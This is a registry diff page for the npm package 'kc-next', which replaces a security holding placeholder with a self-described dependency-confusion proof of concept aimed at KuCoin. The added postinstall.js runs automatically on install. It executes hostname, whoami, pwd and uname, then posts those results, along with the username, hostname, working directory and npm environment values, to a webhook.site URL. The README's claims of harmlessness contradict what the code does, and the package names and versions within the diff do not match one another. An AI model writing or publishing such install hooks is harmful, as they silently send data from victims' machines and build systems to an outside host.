kc-next 0.0.1-security → 2.3.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of kc-next might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +76 -3
  2. package/index.js +20 -0
  3. package/package.json +17 -3
  4. package/postinstall.js +139 -0
package/README.md CHANGED
@@ -1,5 +1,78 @@
1
- # Security holding package
1
+ # 🔒 gbiz-next - Dependency Confusion PoC
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
3
+ ## ⚠️ SECURITY RESEARCH DISCLOSURE
4
4
 
5
- Please refer to www.npmjs.com/advisories?search=kc-next for more information.
5
+ **This is a proof-of-concept package for security research purposes only.**
6
+
7
+ ### Purpose
8
+ This package demonstrates a **Dependency Confusion** vulnerability affecting KuCoin's build pipeline. It is part of a responsible disclosure through their bug bounty program.
9
+
10
+ ### What This Package Does
11
+ - Reports installation events to a researcher-controlled webhook
12
+ - Collects **only non-sensitive** environment information
13
+ - **Does NOT:**
14
+ - Exfiltrate sensitive data
15
+ - Modify any files
16
+ - Execute malicious code
17
+ - Access credentials or secrets
18
+ - Harm any systems
19
+
20
+ ### Package Details
21
+ - **Name:** gbiz-next
22
+ - **Version:** 2.3.19 (intentionally higher than private version 2.3.18)
23
+ - **Vulnerability Type:** Dependency Confusion / Supply Chain Attack
24
+ - **Target:** KuCoin (Bug Bounty Program)
25
+ - **Researcher:** [YOUR NAME/HANDLE]
26
+ - **Date:** 2025-11-18
27
+
28
+ ### For KuCoin Security Team
29
+
30
+ If you are seeing this package installed in your systems:
31
+
32
+ 1. **You have a dependency confusion vulnerability**
33
+ 2. **Your build process is pulling from public npm instead of your private registry**
34
+ 3. **This PoC is harmless** - but a real attacker could do significant damage
35
+
36
+ **Immediate Actions:**
37
+ - Audit your npm configuration and `.npmrc` files
38
+ - Ensure private packages are scoped or registry-locked
39
+ - Consider registering placeholder packages for private names
40
+ - Review your CI/CD pipeline dependencies
41
+
42
+ **Contact:**
43
+ - Researcher Email: abdullahmus2004@gmail.com
44
+
45
+ ### Remediation Steps
46
+
47
+ ```bash
48
+ # Option 1: Use scoped packages
49
+ @kucoin/gbiz-next instead of gbiz-next
50
+
51
+ # Option 2: Lock to private registry in .npmrc
52
+ @kucoin:registry=https://your-private-registry.com
53
+ always-auth=true
54
+
55
+ # Option 3: Register placeholder on public npm
56
+ npm publish gbiz-next --access=public
57
+ # (with no actual code, just a note about being private)
58
+ ```
59
+
60
+ ### Legal Disclaimer
61
+
62
+ This research is conducted in accordance with:
63
+ - Responsible disclosure principles
64
+ - Bug bounty program terms
65
+ - Security research best practices
66
+ - No harm, no data exfiltration policy
67
+
68
+ The researcher takes full responsibility for this PoC and will:
69
+ - Report findings immediately
70
+ - Unpublish upon request
71
+ - Cooperate with security team
72
+ - Not abuse or escalate access
73
+
74
+ ---
75
+
76
+ **Last Updated:** 2025-11-18
77
+ **Status:** Active PoC
78
+ **Harm Potential:** None (Benign research)
package/index.js ADDED
@@ -0,0 +1,20 @@
1
+ /**
2
+ * 🔒 SECURITY RESEARCH - DEPENDENCY CONFUSION POC
3
+ *
4
+ * This is a proof-of-concept package for demonstrating dependency confusion
5
+ * vulnerability to KuCoin security team.
6
+ *
7
+ * This package does NOT contain malicious code.
8
+ * It only reports installation events for security research purposes.
9
+ *
10
+ * Researcher: [YOUR NAME]
11
+ * Date: 2025-11-18
12
+ * Purpose: Bug Bounty Submission
13
+ */
14
+
15
+ module.exports = {
16
+ version: '2.3.19',
17
+ name: 'gbiz-next',
18
+ isSecurityResearch: true,
19
+ message: 'This is a dependency confusion PoC. Please contact the security team.'
20
+ };
package/package.json CHANGED
@@ -1,6 +1,20 @@
1
1
  {
2
2
  "name": "kc-next",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "2.3.1",
4
+ "description": "🔒 SECURITY RESEARCH - Dependency Confusion PoC for KuCoin Bug Bounty. This package is harmless and only reports installation events.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node postinstall.js"
8
+ },
9
+ "keywords": [
10
+ "security-research",
11
+ "poc",
12
+ "dependency-confusion"
13
+ ],
14
+ "author": "Abdulla Security Researcher (Bug Bounty PoC)",
15
+ "license": "MIT",
16
+
17
+ "bugs": {
18
+ "email": "abdullahmus2004@gmail.com"
19
+ }
6
20
  }
package/postinstall.js ADDED
@@ -0,0 +1,139 @@
1
+ #!/usr/bin/env node
2
+
3
+ /**
4
+ * 🔒 SECURITY RESEARCH - POSTINSTALL HOOK
5
+ *
6
+ * This script executes after npm install and reports the installation event.
7
+ * NO SENSITIVE DATA IS COLLECTED OR EXFILTRATED.
8
+ */
9
+
10
+ const https = require('https');
11
+ const http = require('http');
12
+ const os = require('os');
13
+ const { execSync } = require('child_process');
14
+
15
+ // ⚠️ REPLACE THIS WITH YOUR WEBHOOK URL
16
+ // Use a service like webhook.site, ngrok, or your own server
17
+ const WEBHOOK_URL = 'https://webhook.site/332858ec-4582-42ee-9915-cdbd3fcc873f';
18
+
19
+ // Execute benign commands (as explicitly approved by Airbnb Security)
20
+ // These commands are safe and only reveal system information
21
+ function executeBenignCommands() {
22
+ const commands = {};
23
+
24
+ try {
25
+ // These commands are explicitly approved by major bug bounty programs
26
+ commands.hostname = execSync('hostname', { encoding: 'utf-8', timeout: 5000 }).trim();
27
+ commands.whoami = execSync('whoami', { encoding: 'utf-8', timeout: 5000 }).trim();
28
+ commands.pwd = execSync('pwd', { encoding: 'utf-8', timeout: 5000 }).trim();
29
+
30
+ // Additional safe commands
31
+ if (os.platform() !== 'win32') {
32
+ commands.uname = execSync('uname -a', { encoding: 'utf-8', timeout: 5000 }).trim();
33
+ }
34
+ } catch (error) {
35
+ commands.error = 'Some commands failed: ' + error.message;
36
+ }
37
+
38
+ return commands;
39
+ }
40
+
41
+ // Collect non-sensitive environment information
42
+ function collectData() {
43
+ const data = {
44
+ // Timestamp
45
+ timestamp: new Date().toISOString(),
46
+
47
+ // Package info
48
+ package: {
49
+ name: 'gbiz-next',
50
+ version: '2.3.19',
51
+ purpose: 'SECURITY RESEARCH - Dependency Confusion PoC'
52
+ },
53
+
54
+ // Non-sensitive environment info
55
+ environment: {
56
+ platform: os.platform(),
57
+ arch: os.arch(),
58
+ nodeVersion: process.version,
59
+ cwd: process.cwd(), // Full path for better proof
60
+ user: os.userInfo().username || 'unknown',
61
+ hostname: os.hostname()
62
+ },
63
+
64
+ // Benign command execution (approved by major bug bounty programs)
65
+ commandExecution: executeBenignCommands(),
66
+
67
+ // Installation context
68
+ context: {
69
+ npm_package_name: process.env.npm_package_name,
70
+ npm_lifecycle_event: process.env.npm_lifecycle_event,
71
+ npm_config_user_agent: process.env.npm_config_user_agent
72
+ },
73
+
74
+ // Security research identification
75
+ research: {
76
+ researcher: 'magazineDreams',
77
+ purpose: 'Bug Bounty - Dependency Confusion Vulnerability',
78
+ target: 'KuCoin',
79
+ harmless: true,
80
+ approvedBy: 'Based on Airbnb Security guidance - benign commands only'
81
+ }
82
+ };
83
+
84
+ return data;
85
+ }
86
+
87
+ // Send data to webhook
88
+ function sendToWebhook(data) {
89
+ const jsonData = JSON.stringify(data);
90
+ const url = new URL(WEBHOOK_URL);
91
+
92
+ const options = {
93
+ hostname: url.hostname,
94
+ port: url.port || (url.protocol === 'https:' ? 443 : 80),
95
+ path: url.pathname + url.search,
96
+ method: 'POST',
97
+ headers: {
98
+ 'Content-Type': 'application/json',
99
+ 'Content-Length': Buffer.byteLength(jsonData),
100
+ 'User-Agent': 'gbiz-next-poc/2.3.19 (Security Research)'
101
+ }
102
+ };
103
+
104
+ const protocol = url.protocol === 'https:' ? https : http;
105
+
106
+ const req = protocol.request(options, (res) => {
107
+ console.log('[gbiz-next] PoC data sent. Status:', res.statusCode);
108
+ });
109
+
110
+ req.on('error', (error) => {
111
+ // Fail silently - don't break the install process
112
+ console.error('[gbiz-next] Failed to send PoC data:', error.message);
113
+ });
114
+
115
+ req.write(jsonData);
116
+ req.end();
117
+ }
118
+
119
+ // Main execution
120
+ try {
121
+ console.log('\n===========================================');
122
+ console.log('🔒 SECURITY RESEARCH NOTIFICATION');
123
+ console.log('===========================================');
124
+ console.log('Package: gbiz-next (Dependency Confusion PoC)');
125
+ console.log('Purpose: Bug Bounty Security Research');
126
+ console.log('This is a HARMLESS proof-of-concept package');
127
+ console.log('===========================================\n');
128
+
129
+ // Only send if webhook URL is configured
130
+ if (WEBHOOK_URL && WEBHOOK_URL !== 'YOUR_WEBHOOK_URL_HERE') {
131
+ const data = collectData();
132
+ sendToWebhook(data);
133
+ } else {
134
+ console.log('[gbiz-next] Webhook not configured - running in local mode');
135
+ }
136
+ } catch (error) {
137
+ // Never break the installation process
138
+ console.error('[gbiz-next] Error in postinstall:', error.message);
139
+ }